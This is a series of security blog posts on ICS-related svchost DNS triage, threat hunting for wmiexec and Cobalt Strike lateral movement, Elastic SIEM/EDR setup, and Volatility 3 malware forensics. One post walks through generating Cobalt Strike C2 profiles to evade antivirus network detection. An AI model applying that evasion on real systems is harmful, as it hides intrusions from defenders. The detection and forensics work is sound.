I recently had an interesting case, which involved some digging into SVCHost.exe and the command line parameters passed to it.
The Scenario
It started with an alert for a large number of DNS requests associated with an infostealer, ViperSoftX, from a user laptop. There were thousands of requests to the domains in a 90-minute period. Looking at the endpoint telemetry available for the device, I could see that the process responsible for the DNS requests was SVCHost.exe. This was an immediate red flag.
SVCHost.exe
SVCHost.exe is a key Windows operating system process: it hosts Windows services and loads the DLLs used by shared service processes. Outbound connections to domains from SVCHost.exe aren’t terribly common (especially to malicious domains). Historically, SVCHost.exe has been a common process for malware to inject into or perform process hollowing on. This is typically because it routinely loads different DLLs, creates and starts services, and is a stable, long-running process to hide in.
Continued Triage
In our case, there was no evidence of process injection into SVCHost.exe and no evidence of any unusual DLLs loaded either. The infostealer that our domains had previously been associated with has also been around for a while, and its TTPs are well known. It does not typically inject into SVCHost.exe; instead, it sideloads a payload DLL using its own executable and then uses PowerShell to download a second stage. I had seen none of these TTPs.
The traffic patterns also did not make sense. There would be hundreds of requests to the domains in a 90-minute period, then the connections would stop, only to resume a few days later for another 40 minutes, then nothing. For an infected host, we’d expect to see constant beaconing.
Command Line Arguments
The endpoint telemetry for the SVCHost.exe process responsible for the connections included the command line arguments passed to it. The arguments were key to determining what had occurred. I’ve recreated the telemetry on my own host and captured it with Sysmon, using the SwiftOnSecurity Sysmon config.
Replicated Example
In the example below, I’m connecting to my own site and two other security blogs, both of which I highly recommend checking out:
This was the “aha” moment. What if it wasn’t our host that was infected, but another host sharing its internet connection? Internet Connection Sharing (ICS) is essentially internet hotspotting: it allows you to share the internet connection on one device with another.
This would also explain the start/stop nature of the C2 traffic. We’d only seen DNS requests from the SVCHost.exe hosting the ICS service, while the infected host was connected. During an ICS session, DNS requests from the remote host are essentially proxied through the svchost.exe process on our local host.
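If you want to verify this on a live host, a quick sanity check (a sketch, using the PID from this case; substitute your own) is to list the services hosted by the suspect svchost.exe instance and confirm the ICS service (SharedAccess) is among them:

tasklist /svc /fi "PID eq 12484"
sc query SharedAccess

If SharedAccess shows up in the tasklist output and is running, the DNS traffic you’re seeing may simply be proxied on behalf of another device.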
Confirming the Hypothesis
How can we know for sure that our hypothesis is correct? Well, some quick and dirty forensics is the answer.
I dumped the svchost.exe process responsible for the DNS requests (PID 12484).
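For reference, one way to take such a dump is with Sysinternals ProcDump, using the -ma flag for a full memory dump; any tool that produces a full process dump will do:

procdump -ma 12484 12484.dmp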
A quick run of strings across the .dmp followed, with the results written out to a .txt file.
strings 12484.dmp > svchost_strings.txt
Strings Output
# Copyright (c) 1993-2001 Microsoft Corp.
# This file has been automatically generated for use by Microsoft Internet
# Connection Sharing. It contains the mappings of IP addresses to host names
# for the home network. Please do not make changes to the HOSTS.ICS file.
# Any changes may result in a loss of connectivity between machines on the
# local network.
#192.168.137.246 vn-mon-99.mshome.net #
#192.168.137.1 LAPTOP-8FH6K397.mshome.net #
In the strings output above, we can see the Internet Sharing session that was established between our two hosts.
In addition to this, we can also see the domains that we beaconed out to, as well as other general host traffic, and SVCHost activity.
v10.events.data.microsoft.com
AMER08.azure-devices.net
AMER08.azure-devices.net
statics.teams.cdn.live.net
newtonpaul.com
v10.events.data.microsoft.com
gew1-spclient.spotify.com
lowery.tech
kmsec.uk
Inbound rule for Internet Connection Sharing to allow use of the IPv6 DHCP Server. [UDP 547]
Concluding Thoughts
With that, I was able to confirm that it wasn’t our initial host that was infected, but rather a personal host belonging to the user, connected via Internet Sharing.
That brings this mini-post to an end. Hopefully, if you encounter unusual DNS requests coming from svchost.exe with the ICS service loaded, you’ll save some time on triage.
You’d be forgiven for thinking that Threat Hunting is just another cyber buzzword spreading throughout the industry, the latest term used to push more product and managed services on a SOC. The reality, however, is that Threat Hunting is an extremely valuable skill and one that every SOC should have.
In fact, I believe that Threat Hunting provides more value than the traditional approach that many SOCs take: switching on pre-made generic rules from a range of security tools like AV and IDS, and ingesting IOCs from intel providers to search for them across the estate.
This typical approach is what I call a reactive model. A team of analysts sits around waiting for alerts from different tools to trigger; they then triage the alerts and perform an investigation.
In my view, there are a few issues with this approach.
The issues
False Positives: Many generic alerts can be prone to false positives. Vendors design rules to work on many different estates. They’re not designed to work on your specific estate. Additionally, with IOCs, bad intel from a provider can generate a lot of noise on your estate.
Of course, rules can be tuned to perform better and cut false positive noise. But this is not always easy or even possible.
Additionally, false positives play a huge role in creating analyst fatigue. Investigating and closing the same false positives day after day will quickly cause analysts to become frustrated, and lose interest. Team productivity will drop as a result.
If analysts are used to closing false positives all the time, chances are they’ll wrongly close a true positive as a false positive for rules that are particularly noisy.
Detection Gaps: With a reactive approach, you’re relying entirely on the rules you already have to detect the full spectrum of malicious activity.
It requires you to have good detection coverage, but also requires you to have a complete picture of your detection coverage and your detection gaps.
Using frameworks like MITRE ATT&CK is incredibly useful for finding gaps in coverage. However, the reality is that most SOCs do not have their coverage mapped to a framework.
Red Teams can help find gaps in detection coverage. However, most SOCs will only perform one Red Team engagement a year, and a lot can change in a year.
A Different Approach
Some SOCs do already perform threat hunting on their estates, but in most cases this is conducted sporadically when there’s some free time. Free time can be hard to come by when you’re closing false positives all day.
What if, instead of spending 90% of the time reacting to alerts, the focus was switched to a proactive model, with 90% of the time spent Threat Hunting instead? What impact would that have?
The Benefits
Assume Breach: Assume Breach is a common phrase in the industry. It’s a mentality that analysts are encouraged to have when triaging alerts: “assume there’s been a breach”. But sitting around waiting for alerts to come in doesn’t exercise this mentality. With a Threat Hunting focused approach, you’re forced to hold it, as you’re actively looking for threats and successful breaches.
Being Proactive: Being proactive and looking for threats is a better use of time than sitting around waiting for alerts to come in.
You’re not reliant on rules and detections you have, and you can hunt for activity where you have detection gaps.
Team Productivity: Analysts will be more productive. If they’re hunting for new and interesting activity each day, they’ll be more engaged and interested in their work.
Good research-based threat hunting takes skill, and analysts will develop their technical knowledge by conducting in-depth research before hunts.
Understanding Threat Hunting
So we now know the benefits of Threat Hunting, but what actually is it? And how can you do it?
Well, the first thing to make clear is that Threat Hunting is not taking a bunch of IPs and other IOCs and searching for them across your estate. Take a look at the pyramid below. It’s called the Pyramid of Pain. What this pyramid illustrates is the “pain” or effort an attacker will experience if you are able to detect an indicator in each block.
Take the tool Mimikatz as an example. If you detect Mimikatz based on its hash value, it would be trivial for an attacker to modify the binary and change that hash, thereby bypassing your detection. However, if you detected Mimikatz by looking for uncommon processes establishing a handle to LSASS, that would be significantly harder for an attacker to bypass. Additionally, you would also detect other attack tools which target LSASS.
Threat hunting should be focused on the top two blocks of the pyramid, TTPs and Tools.
Threat Hunt Model
There is a near-infinite number of threat hunting models available on the internet, but most of them are more or less the same. The typical model looks like this.
Research: This is one of the phases that I often see overlooked. This is what kicks off your threat hunt. Research can come from a variety of places, maybe you see a new POC for a tool being shared on Twitter. Or maybe you read a blog on a new attack vector. Regardless, this kick starts your research. From here, you dig deeper and investigate the attack vector.
Data and Telemetry: Once you have an understanding of the attack vector, you need to establish whether or not you have the correct data set to detect the threat. Whether it be proxy logs, endpoint logs, or something else.
Build Hypothesis: This is where you establish the logic of your hunt analytic. This stage is closely linked to the research phase. In my experience, the best way to build a hypothesis is to first test the attack vector. Build a lab and practice using the attack tool, or experiment with the attack vector. Once you’ve successfully experimented, review your logs. Observe what data was collected.
Create Hunt Analytic: Next you need to formulate your search. This is essentially where you test your hypothesis against your data and telemetry. A hunt analytic could be anything from a parent and child process relationship to a specific filename and command line value.
Investigate and Incident Response: This obviously only occurs if you find some badness while hunting.
Tune and Review Analytic: Here is where you improve your search to cut out the noise. Likewise, if it’s been turned into an automated analytic, refine it to cut out any false positives.
Let’s Get Technical – Demo
Let’s take a look at a threat hunting example by exploring some lateral movement techniques using Cobalt Strike and Impacket. Neither technique is detected by some of the best EDRs on the market, which makes them good candidates for Threat Hunts.
It’s worth bearing in mind that while EDRs are great tools that have really enhanced the detection capabilities of many organisations around the world, they’re not perfect. They can be bypassed and there are gaps in their coverage. You should never be reliant on just one security tool, and this again proves the value of threat hunting.
Testing Environment
The test environment is made up of two hosts, a desktop PC and a Domain Controller. A market-leading EDR (that shall remain nameless) is installed on the DC. Both hosts have Sysmon running on them with the SwiftOnSecurity Sysmon Config, and these logs are being fed into ELK.
If you’d like to see how to set up an ELK SIEM, you can see my previous blog here.
Attackers Perspective
First, let’s paint the picture of what the attacker has done on our hosts, so it’s clearer what we’re threat hunting for.
User HR was sent a malicious link to a .hta file, which when opened, executes a malicious payload to spawn a Cobalt Strike Beacon running under the user’s context.
As the user does not have admin privileges, the attacker performed privilege escalation. This was done by uploading a secondary payload to the host (via the beacon) and executing it under escalated context using the fodhelper UAC bypass.
This gives us a new beacon running under a higher privileged context. From here, credentials on the host were dumped using Mimikatz via the beacon.
The next step is where we’re going to perform our lateral movement.
Before we do, it’s worth mentioning that a lot of the above activity would have been detected by most EDRs, but there are obviously other ways to achieve the same objectives which can go undetected.
The first method of lateral movement is using wmiexec from Impacket. Using the administrator’s credentials stolen with Mimikatz, we are able to get an interactive shell to the domain controller. Let’s see what using wmiexec looks like, and how we can detect it in a hunt.
WMIEXEC
As wmiexec is open source and the code is available on GitHub, one of the things we might do as part of our research phase is analyse the tool’s code. One part of the code that sticks out is the remote shell function. We can see here that cmd.exe is being launched and is passed the flags “/Q /c”. We also know that WmiPrvSE.exe is likely to be the parent of cmd.exe, as it’s WMI we’re using to establish our shell.
class RemoteShell(cmd.Cmd):
.......................................
self.__output = '\\' + OUTPUT_FILENAME
self.__outputBuffer = str('')
self.__shell = 'cmd.exe /Q /c '
self.__shell_type = shell_type
........................................
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
With that in mind, we can use a query like the one below to search for cmd.exe as a child of WmiPrvSE.exe with the command line “cmd.exe /Q /c” followed by a wildcard.
process.parent.name : "WmiPrvSE.exe" and process.pe.original_file_name: Cmd.Exe and process.command_line : cmd.exe /Q /c *
Searching on this activity returned a few results, including this event.
There’s some interesting stuff here. Based on the command line it looks like a PowerShell command encoded in base64 is being executed, where the output of the command is then written to a temp file in an admin share.
We can use the writing of a file to an admin share to further improve our search query.
FYI, the use of wmiexec to launch PowerShell to then download a malicious executable went undetected by our EDR.
Hunt Performance
Our original query from before returned over 70 hits over a 30 day period on an estate with over 20,000 devices. That’s not bad, but we can improve our hunt query using the new information we now have.
process.parent.name : "WmiPrvSE.exe" and process.pe.original_file_name: Cmd.Exe and process.command_line: *\\127.0.0.1\ADMIN$*
Running the query above returned hits for only our attacker activity, nothing else. That makes it a good hunt, and we could probably turn it into a high-confidence detection based on the 0% false-positive rate.
Lateral Movement with Cobalt Strike
Interestingly wmiexec isn’t the only attack tool that utilises the admin share. The “Jump” function that can be run from a Cobalt Strike beacon also writes a file into the admin share. If we look at the Lateral Movement (Spawn a Session) section of the Cobalt Strike Beacon Documentation we can see multiple functions that use the admin share.
If we look in our logs, we can see quite a few useful entries for the activity we can build hunts on.
Registry key added
We can see details of a registry key being added to the host as part of the creation of a new service.
There’s a separate event for the installation of a new service, again with our new executable included.
A service was installed in the system.
Service Name: 0134ebf
Service File Name: \\GSOC-Lab-DC\ADMIN$\0134ebf.exe
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem
There are a few things we could hunt for to find this activity in the future.
Creation of a new service where the service file name includes the admin share.
Creation of a registry key by services.exe which calls a file in the admin share.
Process creation of a file located in the admin share with services.exe as the parent.
File written to disk in the admin share where the file name matches the following regex “admin\$\\[a-zA-Z0-9]{7}\.exe$”
When Cobalt Strike writes a file to the admin share, it generates a random file name consisting of 7 alphanumerical characters. This regex I’ve created here may need to be modified depending on the regex flavour you use.
What you need to hunt
To develop an effective basic threat hunting function in your SOC you do not need much.
MITRE Mapping: I would recommend mapping your hunts to MITRE ATT&CK; this will help you keep track of which coverage gaps you have hunted in and which need more focus.
Plan: Plan your hunts. This saves analysts from hunting for the same things and duplicating work.
Talented Analysts: Threat hunting is not easy, and it takes time and skill to perform research and develop hunts from research. Give your analysts the time, freedom and resources to perform research and hunts.
Logs: Make sure you have the basic logs coming into your SIEM or Search Platform. Proxy logs, endpoint logs (whether EDR or Sysmon), Authentication logs, etc…
Alerting: Believe it or not, I’m not against alerting and use cases, just low-quality ones. For hunts that produce a very low false-positive rate, hunt logic can be used to create a detection alert. Alerting obviously plays an important role in any SOC and needs to work alongside threat hunting.
Closing Thoughts
At the beginning of this post, I said that SOCs should spend 90% of their time threat hunting and 10% of their time dealing with alerts and tickets. This is obviously not realistic. But what I think every SOC should do is put more resources into research-based threat hunting, and use that process to create high-confidence detections. I genuinely think at least 60% of analysts’ time should be spent researching and threat hunting on the estate. I believe that this can deliver a lot more value than spending the majority of the time responding to low-quality false positives.
A well-developed Threat Hunting function will aim to automate hunts and generate threat leads for analysts to pick up and investigate. In my mind, this could be used in place of generic, low-quality detections.
More to come…
I’ll be releasing another post soon on how you can take threat hunting to the next level, and how you can incorporate the Sqrrl Framework into improving your threat hunt capability. As well as how you can automate threat hunts with a SOAR.
I’ll also be releasing some mini-posts on creating detections for common attack tools like Cobalt Strike and Impacket.
In this mini-post, we’re going to look at how to easily bypass network detections for Cobalt Strike beacons. Many AV products like Symantec Endpoint Protection (SEP) have network detection capabilities that monitor traffic passing through a device’s network interface. Additionally, IDS and IPS products have basic detections for C2 traffic. These detections essentially look for specific patterns in network packets.
For popular tools like Cobalt Strike, the basic “out-of-the-box” settings for Beacons have been fingerprinted by vendors and are therefore going to be detected.
In Cobalt Strike, Malleable profiles are used to define settings for the C2. You have a choice of different protocols for your C2 with HTTP, HTTPS and DNS being three popular ones. HTTP Beacons are easily detectable, due to the payload being unencrypted. For HTTPS connections, detections occur on the certificate used for encryption.
Like with any exploitation tool, if you use the default values it’s likely you’ll be detected. There are Malleable profiles available on GitHub which can be used and these will change your C2 settings from the default. However, these have also been fingerprinted, and will also generate a detection. The profiles available on GitHub are more aimed at testing your detection capability of different APTs and CrimeWare C2s seen in the wild in the past.
The Solution
Luckily Cobalt Strike Malleable C2 profiles are highly customisable. In fact, customisation is one of the reasons why Cobalt Strike is so popular and also so effective. You could write your own profile and there are some guides online that show you how to do this.
However, there is an easier way, C2 Concealer. The tool, created by FortyNorth Security, was released last year and features a Python Script which will generate a C2 Profile based on a few variables defined by the user.
Demo
Installation is easy, just clone the GitHub repo, and run the install script.
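The clone-and-install steps look something like this (repo URL and install script name as published by FortyNorth Security at the time of writing; adjust if they have changed):

git clone https://github.com/FortyNorthSecurity/C2concealer.git
cd C2concealer
chmod u+x install.sh
sudo ./install.sh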
Once the install is complete, run the script and define a hostname you wish to use.
C2concealer --hostname newtpaul.com --variant 1
Next, C2Concealer will scan your host to locate c2lint. C2lint is a tool included with Cobalt Strike which is used to test and troubleshoot profiles before they’re used.
Once the scanning is finished, you’ll be asked to choose an SSL option. Using a legitimate LetsEncrypt cert is obviously going to be the most effective at avoiding detection. However, that requires you to point the A record at your team server. For the purposes of this, we’ll just use a self-signed cert.
You’ll be asked to fill out some basic information for the cert. It doesn’t matter too much what you put here.
Once it’s complete you should receive confirmation that the profile has passed the c2lint check. The name of the newly created profile will also be displayed.
Next, launch your team server, but this time defining the profile to load.
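For example (the IP, password and profile path here are placeholders; use whatever C2Concealer generated for you):

sudo ./teamserver 192.168.1.10 MyPassword /opt/cobaltstrike/profiles/generated.profile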
Generate a new listener and a new payload of your choice.
Before VS After
Before using our newly created profile (i.e. with the default C2 profile in place), SEP blocked outbound connections to our Cobalt Strike team server.
However, after using our newly created profile, nothing was blocked and we were able to successfully establish a C2.
Conclusion
And that brings this quick post to an end. I hope you found it useful! You can read a previous post I wrote on Cobalt Strike here.
A few months ago I released a couple of blog posts on how to create enterprise monitoring at home with ELK and Zeek. This post is a continuation of that series…sort of. A lot has changed since those posts, mainly updates to the ELK stack and the release of a number of free EDR tools, such as OpenEDR from Comodo and Elastic EDR. So I thought now would be a good time to see what’s changed with Elastic and try out their new EDR. In this post, I’m going to show how to install Elastic SIEM and Elastic EDR from scratch.
Network Design
Below is a very simple network diagram for this post. ELK is running on a Ubuntu 20.04 Server hosted on ESXi. Zeek is also running on a Ubuntu 20.04 server, and a port on my switch is being mirrored to a port on my ESXi server. You can read more about Zeek and port mirroring in my previous blog here.
Also running on ESXi is a Windows 10 machine, where we will install the Elastic EDR agent. I also have a Windows AD machine. This host does not feature in this post but will be used in future posts where I perform additional testing with the Elastic EDR.
Installing ELK Basics
I’m going to breeze through this section, as I’ve covered it before, and there are tons of guides out there already on how to get a basic ELK setup working. In my case, I’m using the newest release of ELK which is 7.10.
For my ELK setup, I’m using a single Ubuntu Server 20.04 virtual machine running on ESXi. This server will run Elasticsearch and Kibana.
First, install curl and apt-transport-https.
apt-get install curl apt-transport-https
Next, add the Elastic repository to your sources list.
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee /etc/apt/sources.list.d/elastic-7.x.list
Then update.
apt-get update
Now install Elasticsearch
apt-get install elasticsearch
Once Elasticsearch is installed, we need to make a couple of changes to its configuration file, located at /etc/elasticsearch/elasticsearch.yml. You need root privileges to edit this file.
First, we need to change the network.host value. Its default is set to the localhost. Change it to the IP address of the host you installed Elasticsearch onto.
network.host: <elasticsearch_ip>
Next within the same file, we need to change two node name values. In my case, I’ve just set both values to node-1
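For a single-node setup, those two values are typically node.name and cluster.initial_master_nodes, so the relevant lines in elasticsearch.yml end up looking something like this:

node.name: node-1
cluster.initial_master_nodes: ["node-1"]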
Now you should be ready to start Elasticsearch and check that it’s started correctly.
service elasticsearch start
service elasticsearch status
You can also check that Elasticsearch is accessible from other hosts by running:
curl http://<elasticsearch_ip>:9200
The output should look similar to the one below. (Disclosure: this pic is taken from my previous ELK post, hence why the details don’t match my new deployment.)
Installing Kibana
Run the command below to install Kibana.
apt-get install kibana
Once the installation is complete, edit your /etc/kibana/kibana.yml and specify the IP address hosting Kibana.
server.host: "Your_IP"
In the same file, also specify the IP address of your Elastic Instance.
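That setting is elasticsearch.hosts; for example:

elasticsearch.hosts: ["http://<elasticsearch_ip>:9200"]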
Filebeat is used to ship data from devices to Elasticsearch. There are a number of different Filebeat modules for different products that send logs and data to Elasticsearch in the required format. In this example, we’re using the module for Zeek, but Elastic has greatly expanded its support for additional products in recent months, including AWS, CrowdStrike, ZScaler and more.
For now, we’re just going to install Filebeat on our host running Zeek, we’ll worry about configuring it later.
apt-get install filebeat
Configuring X-Pack
As it stands, the only functionality we have within our ELK deployment is log ingestion and visualisation. We can ingest logs into Elasticsearch and manipulate the data with Kibana visualisations, but the core functionality of a SIEM is missing: we’re unable to build detections or use cases. This feature is not available “out of the box”, and in order to use it, we must first configure security between all of our different nodes. X-Pack is the Elastic package that is essentially responsible for all Elastic Security functionality.
One key requirement is to configure SSL connections between each node. There are a number of ways to do this; we are going to use X-Pack for this as well.
Firstly, on the host with Elasticsearch installed, we need to create a YAML file, /usr/share/elasticsearch/instances.yml, which will contain the different nodes/instances that we want to secure with SSL. In my case, I only have Elasticsearch, Kibana and Zeek.
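A minimal instances.yml for this setup might look like the one below (the IP addresses are examples; the Zeek host IP in particular is a placeholder for your own). The certificates can then be generated with elasticsearch-certutil, which also produces the CA used throughout the rest of this post:

instances:
  - name: "elasticsearch"
    ip: ["192.168.1.232"]
  - name: "kibana"
    ip: ["192.168.1.232"]
  - name: "zeek"
    ip: ["192.168.1.234"]

/usr/share/elasticsearch/bin/elasticsearch-certutil cert --keep-ca-key --pem --in instances.yml --out certs.zip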
Now we’re going to repeat the process but this time for Kibana. The configuration is slightly different for Kibana.
Again, move your certificates to the correct folder and set the correct permissions.
Note: The following steps are assuming you are running a standalone ELK configuration. If you are running a distributed deployment, you’ll need to move certificates to the appropriate hosts.
Next, in your file /etc/kibana/kibana.yml add the settings for SSL between Elasticsearch and Kibana.
# The URLs of the Elasticsearch instances to use for all your queries.
elasticsearch.hosts: ["https://192.168.1.232:9200"]
elasticsearch.ssl.certificateAuthorities: ["/etc/kibana/certs/ca/ca.crt"]
elasticsearch.ssl.certificate: "/etc/kibana/certs/kibana.crt"
elasticsearch.ssl.key: "/etc/kibana/certs/kibana.key"
And then in the same file, add the configuration between Kibana and your browser.
# These settings enable SSL for outgoing requests from the Kibana server to the browser.
server.ssl.enabled: true
server.ssl.certificate: "/etc/kibana/certs/kibana.crt"
server.ssl.key: "/etc/kibana/certs/kibana.key"
Then, restart Kibana.
service kibana restart
Configuring Beats (Zeek) SSL
For the next step, we need to configure SSL for our host running Zeek and Beats. If you’re not running Zeek or any other product that uses a Filebeat module (Suricata, Windows event logs, etc.), then you can skip this step.
First copy your certificates over to your host running Zeek, then create the cert directories with the correct permissions. You’ll need to copy both the Zeek certificates and the CA certificate.
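The SSL-related part of /etc/filebeat/filebeat.yml then points at those certificates. A sketch (the paths and IP are from my lab; the certificate file names are whatever elasticsearch-certutil generated for your Zeek instance):

output.elasticsearch:
  hosts: ["https://192.168.1.232:9200"]
  ssl.certificate_authorities: ["/etc/filebeat/certs/ca/ca.crt"]
  ssl.certificate: "/etc/filebeat/certs/zeek.crt"
  ssl.key: "/etc/filebeat/certs/zeek.key"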
Now you can check that Filebeat is able to contact Elastic by running the command below. Everything should return back “ok”.
filebeat test output
Adding Authentication
We also need to add authentication to Elastic. This is pretty easy to do. Firstly, enable X-Pack by editing your /etc/elasticsearch/elasticsearch.yml
# X-Pack Setting
xpack.security.enabled: true
Next, we need to generate passwords for all of our built-in Elastic roles and users. There’s a tool included with Elasticsearch to do this. Run the command below to generate these passwords and save them somewhere safe (password manager). We’ll be using the Elastic password for the next part.
/usr/share/elasticsearch/bin/elasticsearch-setup-passwords auto
Next, add the newly created Elastic credential to your Filebeat config file, /etc/filebeat/filebeat.yml
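Those credentials go under the same output.elasticsearch section used above, for example:

output.elasticsearch:
  username: "elastic"
  password: "<password generated by elasticsearch-setup-passwords>"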
You should now see a login box when you navigate to your Kibana IP address.
Adding data to Elasticsearch
So we now have everything set up; the next thing we need to do is start ingesting data into Elasticsearch. In my case, I’m going to be using Zeek to tap my network traffic. I’ve already covered how to do this in my previous two blogs, so I’m not going to cover it again here.
And to see how to configure the Filebeat Zeek module, read from “Configuring Zeek” in my part 2 blog here.
Enabling Detections
Once you have completed all the above steps and have data ingesting into Elastic, you will probably notice that you are still unable to create detections. There is one final step to complete. Edit your Kibana config file, /etc/kibana/kibana.yml, and add an xpack.encryptedSavedObjects.encryptionKey. I believe this can be any 32-character string.
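For example:

xpack.encryptedSavedObjects.encryptionKey: "something_at_least_32_characters_long"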
You should now be able to view the built-in detection rules and create your own. We’ll look at how to create rules in another future post.
Installing Elastic EDR Agent
Now we’re ready to install the Elastic EDR. First, navigate to the “Fleet” dashboard by clicking on the link under the Management tab located on the side menu.
From the fleet management menu, click “add agent”. Now it’s likely that you’ll be requested to add an integration policy before you can install agents, just follow the wizard and keep the defaults.
We’re going to use the “Enroll in Fleet” option to install the EDR.
First, download the Elastic Agent onto your Windows/Linux Host.
Once you have the agent downloaded, keep the default policy selected under the Agent policy.
Before moving on to Step 3, we have another step to complete.
If we were to install the agent onto our Windows host now, we would receive an error that our self-signed certificate is from an untrusted source, and our agent install would fail.
So what we need to do is to add our CA certificate as a trusted certificate on our Windows host.
Install Certificates
First search for “Local Security Policy” in your Windows search bar. Then go to Security Settings > Public Key Policies > Certificate Path Validation Settings
Then check the Define these policy settings option, and also check the Allow user trusted root CAs to be used to validate certificates and Allow users to trust peer trust certificates options if they’re not already selected.
Finally check Third-Party Root CAs and Enterprise Root CAs.
Click apply and ok.
Next search for certmgr.msc in the Windows Search Bar.
Then go to Trusted Root Certification Authorities > Certificates and right-click anywhere in the whitespace and select All Tasks > Import
Then simply follow the wizard and select the ca.crt we created earlier.
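Alternatively, if you prefer the command line, the same import can be done from an elevated prompt with certutil (the path here is a placeholder for wherever you copied the CA certificate):

certutil -addstore -f Root C:\certs\ca.crt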
Install the Agent
Now we’re ready to install the Elastic Agent. Copy the install command from the Fleet Dashboard and run it with PowerShell on your Windows host where the agent is located.
If all has gone right, you should see the agent has been successfully enrolled via the fleet dashboard.
We’re not done yet, however; we need to check that data is being ingested correctly into Elasticsearch from our agent. You can do this by navigating to the Data Streams tab, which should be populated with endpoint data. If there is no data here, check your fleet settings by clicking the settings cog in the top-right corner. Ensure that your Elasticsearch settings point to the correct IP and are not set to localhost.
Finally, we need to enable detection rules for our EndPoint agent. Go to the detections dashboard in the Kibana Security app, and “enable” any endpoint rules you want.
Now you can test that it works: perform some badness on your Windows host and see what happens! In my case, Elastic EDR successfully detected and prevented both the Mimikatz files and the process execution of Mimikatz.
We can also see this in our Kibana Security Detections Dashboard.
And we can also dive a little deeper with a nice little process tree graphic and an overview of the event. Very cool!
Conclusion
And so that brings this post to an end; I hope you’ve found it useful. So far, with the limited testing I have done, I have found Elastic’s EDR to be impressive. It has the look and feel of an enterprise-grade tool, which, considering it’s open-source, is amazing. I plan to do some more thorough testing in the future to see how it performs, but as it stands it certainly seems to be the leading EDR in the open-source world. It would be my go-to recommendation for small to medium businesses that may not have the budget for other expensive tools. The question is, can it give the big paid tools a run for their money?
In this post, we’re going to take a look at Volatility 3, the newest version of the industry’s most popular memory forensics tool (within the open-source community at least).
We have a memory dump from an infected host that we’re going to look at and compare how the newest version of the tool performs as opposed to volatility 2. Let’s get started!
Install Volatility
Firstly, we need to install a couple of dependencies: Python 3 and pefile. I’ve installed Python 3.8.6 from here.
When installing Python, make sure you tick the box “Add Python 3.8 to PATH” if you do not want to add the PATH manually.
Follow the default instructions to complete the installation.
Next, we need to install PEFile. I installed PEFile using pip.
pip install pefile
I installed version 2019.4.18 which you can find here.
These are the only two “required” dependencies for Volatility, so we can now move on to installing Volatility itself.
I used Git to download Volatility; you can download Git from here if you do not already have it installed. Once installed, launch Git Bash and run the clone command.
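That command is simply a clone of the official Volatility 3 repository:

git clone https://github.com/volatilityfoundation/volatility3.git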
The package should be cloned into a folder called volatility3, which by default will be located in your user folder. So in my case, it’s C:\Users\paul\volatility3
We can now check if volatility has been installed properly by navigating to our volatility3 folder in CMD and running the command.
python vol.py -h
If all has gone right, we should see an output like the following:
This means that we’re now ready to use volatility to analyse our memory dump.
Using Volatility
Anyone who, like myself, is used to using Volatility 2 will immediately notice some obvious changes in Volatility 3. Firstly, profiles are gone, so you no longer have to scan a memory dump to find out which OS profile it’s compatible with. YAY 🙂
The way in which plugins are called in the command line is also slightly different. For example, if we want to run the plugin pslist to display the running processes in a memory image, we would do so by specifying the plugin name windows.pslist.PsList
Let’s give that a try now!
Top Tip: It’s good practice to record the output of volatility into txt files. That way we can easily go back and read through the results instead of having to try and read everything via the command line. I’ve created a new folder called evidence, and the results from each plugin run will be written to txt files in there.
To run the pslist plugin we’re going to run the following command:
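It looks roughly like this (the memory image name here is a placeholder for your own dump file):

python vol.py -f memdump.mem windows.pslist.PsList > evidence\pslist.txt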
Let’s break this command down to understand what it’s doing. Firstly, we’re telling Python to run our Volatility script, vol.py. Then we’re using the -f flag to specify the location of our memory dump file. Next, we’re specifying the name of the plugin we want to run, and finally, we’re using the > operator to redirect the results to a txt file called pslist in our evidence folder.
This is the basic command line format that we’re going to need to use for most plugins. Let’s go ahead and run some of the core plugins to gather some basic information. We’re going to run:
pslist – gives us a list of running processes.
pstree – gives us the same information as pslist, however, displays the output in a process tree so we can see child and parent process relationships.
netscan – gives us open network connections.
Processes
If we look at the output from running pslist below, there are a couple of processes that catch my eye, firstly Microsoft Word. As we know, Microsoft Office applications like Word and Excel are commonly used to distribute malware usually by using a malicious macro or embedded file. The Emotet campaign is particularly well known for using these methods.
The other application that catches my eye is fphc.exe. This is not an application that I am familiar with and does not look to be a Windows application. Basically, it looks weird.
Running pstree does not give us anything else of interest. WinWord.exe has a parent of explorer.exe, which is to be expected. Our other application of interest, fphc.exe, has a Parent Process ID (PPID) of 5668; however, no process with that PID appears in the recorded pslist output. This likely means that fphc.exe is an orphan process.
We can perform basic OSINT on the IPs returned by netscan using tools like VirusTotal. Many of the IP addresses appear to belong to Microsoft, specifically Azure.
When searching on the Microsoft IP addresses, none of them returns any “detection” hits. However, if we look in the “relations” tabs at communicating files, we can see many hits on malicious Word documents that have called out to some of the IPs we’ve seen. If we draw a threat graph, like the one below, we can see an example of a malicious document that has been associated with the Microsoft IP 52.114.132.91.
It can often be difficult to determine if connections to cloud services like Azure and AWS are malicious or not, due to the fact that IP addresses are shared and reused by different users. It’s a good place for malware authors to hide their attack infrastructure and attempt to blend in with legitimate traffic.
Aside from the Microsoft IP addresses, there were also two other addresses from netscan which are of significant interest.
62.108.35.36 185.99.2.123
Both of these addresses returned detection hits on VirusTotal. Additional OSINT links both of these IPs to TrickBot infrastructure. TrickBot is a well-known banking trojan that has been around for several years now. It is commonly distributed via Emotet.
Digging Deeper
We’ve seen a few things now which make us suspect that TrickBot malware has been delivered onto the host via Emotet. Now we need to try and confirm that this is what has occurred.
Firstly, let’s look to see if PowerShell was used by a macro to download malware, as is commonly the case. We can use the cmdline plugin to list process command line arguments.
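In Volatility 3 terms, that is the windows.cmdline.CmdLine plugin, run the same way as before (the memory image name is again a placeholder):

python vol.py -f memdump.mem windows.cmdline.CmdLine > evidence\cmdline.txt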
Unfortunately, there were no interesting PowerShell commands in the results. In Volatility 2, we had the option to use the plugins “cmdscan” and “consoles”, as well as third-party plugins that try to locate interesting PowerShell activity in memory. We’re a little more limited with Volatility 3, as we only have the “cmdline” plugin.
However, cmdline still returned some useful pieces of information.
We have the name of the Word Document that was opened by the user:
In Volatility 2, we were able to use the “dumpfiles” plugin to dump files from memory. However, that seems to no longer be an option in Volatility 3. We can, however, dump a running process by using the pslist plugin with a dump flag. Using the command below, we can dump fphc.exe for analysis.
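The command looks something like this (substitute the PID that pslist reported for fphc.exe; the image name is again a placeholder):

python vol.py -f memdump.mem windows.pslist.PsList --pid <fphc_pid> --dump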
